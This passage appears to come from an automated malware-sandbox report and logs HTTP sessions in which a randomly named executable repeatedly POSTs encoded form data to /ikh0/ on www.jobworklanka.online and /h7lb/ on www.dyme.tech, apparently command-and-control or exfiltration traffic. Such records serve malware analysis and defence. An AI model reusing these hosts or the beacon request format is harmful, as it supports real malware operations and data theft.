                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.55363591.184.0.200801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:30.063503981 CEST837OUTPOST /ikh0/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Origin: http://www.jobworklanka.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 42 6c 65 64 68 34 4e 58 50 42 61 38 2f 4f 67 2f 61 2b 2b 55 75 6a 45 56 42 48 62 32 73 68 57 41 55 37 76 4b 49 44 38 3d
                                                        Data Ascii: x0wHoJ8X=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBledh4NXPBa8/Og/a++UujEVBHb2shWAU7vKID8=
                                                        Sep 18, 2024 16:19:30.688004971 CEST500INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:30 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.55363691.184.0.200801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:32.606756926 CEST857OUTPOST /ikh0/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Origin: http://www.jobworklanka.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 6f 74 52 55 54 42 39 52 33 70 4f 59 2f 36 57 55 70 42 42 34 46 58 49 4e 4f 43 44 6a 56 36 51 78 76 44 4f 49 4c 51
                                                        Data Ascii: x0wHoJ8X=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DotRUTB9R3pOY/6WUpBB4FXINOCDjV6QxvDOILQ
                                                        Sep 18, 2024 16:19:33.214298964 CEST500INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:33 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.55363791.184.0.200801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:35.149058104 CEST1874OUTPOST /ikh0/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Origin: http://www.jobworklanka.online
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jobworklanka.online/ikh0/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 2b 30 30 75 34 7a 46 74 57 56 6b 56 77 53 57 30 58 63 39 55 37 69 4e 49 50 57 52 57 56 4a 49 38 64 58 66 36 53 62 47 58 51 2b 4f 6c 7a 4c 66 65 75 78 32 2f 34 32 35 69 79 59 52 66 34 41 79 7a 43 38 61 4d 4b 4e 68 31 35 6a 6d 5a 54 56 76 6b 32 48 2b 56 58 38 79 65 59 78 36 49 6a 36 61 79 4b 72 78 55 30 70 70 2f 67 59 42 47 38 36 79 56 62 49 6f 46 35 2f 53 36 4d 62 33 68 67 5a 43 6e 4f 58 64 39 63 46 54 4e 6e 44 67 70 32 6f 74 47 53 6a 47 4b 39 69 33 54 32 6c 47 39 63 71 78 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQy+00u4zFtWVkVwSW0Xc9U7iNIPWRWVJI8dXf6SbGXQ+OlzLfeux2/425iyYRf4AyzC8aMKNh15jmZTVvk2H+VX8yeYx6Ij6ayKrxU0pp/gYBG86yVbIoF5/S6Mb3hgZCnOXd9cFTNnDgp2otGSjGK9i3T2lG9cqxKXzvCuhyrMdmvphYxSFy4Kh3dHOT4jxH/fs9nKo0qilH97dwfVd1ZsaCd+/p+XveUde/hCZBm/IdUtBjsOGKjAJ4lqAo0s4t9woJ182wwb0ScrSCweWPovR9QYadj86sVwYJ3Gw4S/urFOSvecZZnSsUAXWcIFY8sZqa0rChQko9dHOC+dsWMfMqj7/+c9zGcZ7WlKJn6nF7KPkXzb1GSAUkpNLvx/qQiFi0gHavs1ADP4WqcCguwbGFgdkoNhZgoz1Nv32IaQK5XvmvHzNYGHkWBQArqsvuDLylDapMg1ZcbWOWUty0wb3oldaaRtlczNxeaFtSFtyuPuMdZuA7uuO8fiKMuD8VCp0QseqhBYqIzk2Dbe2PMLCpOUysDRiWzbqfpdnNk1qMFpeO2NfE5LhS72GN0KSrcGtUH8yIegL6yzrYEyxa3/jUld2pUZOVsoovFJS/bCz1yB4WZVKbyy3x8YfiEiV2WcnJA6v+DINU5hV1EhEfOS7J5hEQ2HlQemItIt3l8gMbgz6BlBwutJtT2hFzsKYznk/HPQoJa2h8X2x6FgJngPed6CXONOD8oyeEAWZ74zw/azA8PKI91T9U7I5pazij4pkYBSja5folXwMMz5Q9yFTitxwjaF+0YUQksjbl5Gp35vrsSr8FSBfuT0Url65Dr3 [TRUNCATED]
                                                        Sep 18, 2024 16:19:35.871685982 CEST500INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:35 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.55363891.184.0.200801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:37.691410065 CEST568OUTGET /ikh0/?2VDlJ=Z2VdhTx&x0wHoJ8X=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1jr66Q514zDlJHSMgPbfeUgvtl8EMtFUh5bwjyzdjbkT63w== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.jobworklanka.online
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:38.348726988 CEST500INHTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:19:38 GMT
                                                        Server: Apache
                                                        X-Xss-Protection: 1; mode=block
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.55363913.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:43.398394108 CEST807OUTPOST /h7lb/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Origin: http://www.dyme.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dyme.tech/h7lb/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 65 63 77 35 44 6a 4a 59 66 45 44 4c 59 69 41 6b 50 78 51 36 35 73 7a 73 41 63 67 32 56 6f 46 32 6a 37 30 53 62 38 3d
                                                        Data Ascii: x0wHoJ8X=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ktecw5DjJYfEDLYiAkPxQ65szsAcg2VoF2j70Sb8=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.55364013.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:45.944848061 CEST827OUTPOST /h7lb/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Origin: http://www.dyme.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dyme.tech/h7lb/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 41 4c 38 54 55 58 6e 6c 4a 73 73 41 72 45 4d 4d 6f 44 68 2b 4b 72 34 58 4a 66 42 77 59 75 47 4b 6e 34 74 41 52 68
                                                        Data Ascii: x0wHoJ8X=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZAL8TUXnlJssArEMMoDh+Kr4XJfBwYuGKn4tARh


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.55364113.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:48.491103888 CEST1844OUTPOST /h7lb/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Origin: http://www.dyme.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dyme.tech/h7lb/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 41 71 4c 72 53 73 71 73 35 66 6f 50 6b 74 77 43 51 6e 31 79 70 32 79 44 66 44 4f 73 4d 65 73 64 71 66 39 44 35 61 4d 43 4e 59 63 2f 48 51 68 77 70 76 6b 77 65 71 38 42 6d 62 55 69 37 35 74 48 59 78 66 2b 43 2b 6e 77 64 4c 50 58 33 7a 33 32 73 73 58 6e 36 71 30 44 41 59 6e 38 59 57 65 59 72 7a 62 32 68 68 4c 4f 55 36 79 4f 45 6d 39 64 49 58 72 45 49 61 35 39 6a 35 61 46 65 49 6d 38 66 6c 48 54 78 68 44 6f 59 52 57 4a 30 78 42 47 6b 44 37 49 52 35 53 76 63 45 37 43 74 56 67 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/AqLrSsqs5foPktwCQn1yp2yDfDOsMesdqf9D5aMCNYc/HQhwpvkweq8BmbUi75tHYxf+C+nwdLPX3z32ssXn6q0DAYn8YWeYrzb2hhLOU6yOEm9dIXrEIa59j5aFeIm8flHTxhDoYRWJ0xBGkD7IR5SvcE7CtVgp2K99SCM65sdBt7AlsktZeF79krTExzicIb+lgz0nILLi84nKkxRK8pO+3vtgMiC4p2ppuRUiXYSDjly+hwLGCBty5kix6G1sqqC8khOuqFaQVRw+zvKB7TdJ/bqZMOEew2MFomKjadc7mb0svIFhVLmm1BizkLWBDY2R3p9y+NpFYvHDEDCs9Y4zzeZURaN81snGPSHnLEvbasDzb40WgiYzLy+GHc+rJVZrjgwJMzBT2GQCGWRkcEThwHPNIK+XpHVDnsf4PMflEViqrGk9RZ+HiKUjiVNxVaUlViVNRC+uQPO7dxxkQjLttnW9w/3IwWLRvFJu9v7e6Pjx2qo08bJpMli3AbTfmZOTKmyj+jhZnbAjy7hdkfkxBpyZvhOv/w72wnchAvhyF8HSjPpEoZDPgS52KHfTpsRI6JM+sgpWbJt4weQ2FVBiVp9eYLm2/jSQDiKyQvm8ISuMyzT7RY6aO7PeRnivHoyubVwMojv93AnjHhfHFPXSePZoZcPZggF4l4R8NfCRY0WE3v95SqenvPeq6kKLfOxgf+pnGgTDDEf1bWLDIFQwXaGuI+5+MS3yfdhjipg9dF9GlMUsf83qo7nFkO/eRupRrdH2PxcJCnLordUnuJWmWpyr+/pATXwSipRXl9STVsDK52ptGd7e2QIaYD0oK [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.55364213.248.169.48801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:19:51.036479950 CEST558OUTGET /h7lb/?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx HTTP/1.1
